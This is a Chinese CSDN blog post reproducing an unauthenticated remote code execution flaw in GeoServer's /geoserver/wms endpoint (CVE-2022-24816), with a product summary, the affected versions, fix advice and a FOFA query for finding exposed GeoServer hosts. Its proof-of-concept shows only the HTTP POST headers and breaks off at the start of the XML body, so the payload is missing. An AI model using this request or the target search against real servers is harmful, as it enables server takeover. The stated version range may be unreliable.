GeoServer /geoserver/wms RCE漏洞复现(CVE-2022-24816)

本文介绍了GeoServer的地理数据服务器功能,详细阐述了/geoserver/wms接口存在的远程代码执行漏洞,影响GeoServer 1.2.2以下版本。未授权的攻击者可以利用该漏洞执行任意shell命令。复现环境为FOFA标记的GeoServer应用,修复建议包括限制接口访问和升级到安全版本。
摘要由CSDN通过智能技术生成

0x01 产品简介

GeoServer是一款开源的地理数据服务器软件,主要用于发布、共享和处理各种地理空间数据。它支持众多的地图和空间数据标准,能够使各种设备通过网络来浏览和使用这些地理信息数据。

0x02 漏洞概述

GeoServer /geoserver/wms 接口处存在远程代码执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意shell命令,从而获取服务器权限。

0x03 影响范围

GeoServer <1.2.2

0x04 复现环境

FOFA:app="GeoServer"

0x05 漏洞复现

PoC

POST /geoserver/wms HTTP/1.1
Host: your-ip
Content-Type: application/xml
Accept-Encoding: gzip, deflate

<?xml version="1.0" encodin
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值